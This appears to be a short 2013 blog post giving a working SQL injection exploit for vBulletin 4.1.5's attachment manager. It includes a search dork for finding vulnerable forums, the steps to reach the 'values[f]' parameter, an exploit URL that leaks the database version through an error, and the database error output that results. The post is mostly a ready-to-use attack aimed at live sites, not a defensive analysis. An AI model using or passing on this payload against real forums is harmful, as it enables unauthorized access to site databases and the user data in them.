vbulletin 4.1.5 attachment SQLI
examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values [f]" insert our SQL query. Example:
Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After that, we see the standard error of the database offline, thus opening the source code of the page and see:
Code:
<! -
Database error in vBulletin 4.1.5 :
Invalid SQL :
SELECT
permissionsfrom , Hidden , setpublish , publishdate , userid
FROM ds23fSDdfsdf_cms_node
WHERE
nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
MySQL Error : Duplicate column Name .1.49-3 '5 '
Error Number : 1060
Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM
Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33
Address : 127.0.0.1
Username : Hacker
Classname : vB_Database
MySQL Version :
->
الأربعاء، 27 مارس 2013
vbulletin 4.1.5 attachment SQLI
الاشتراك في:
الرسائل (Atom)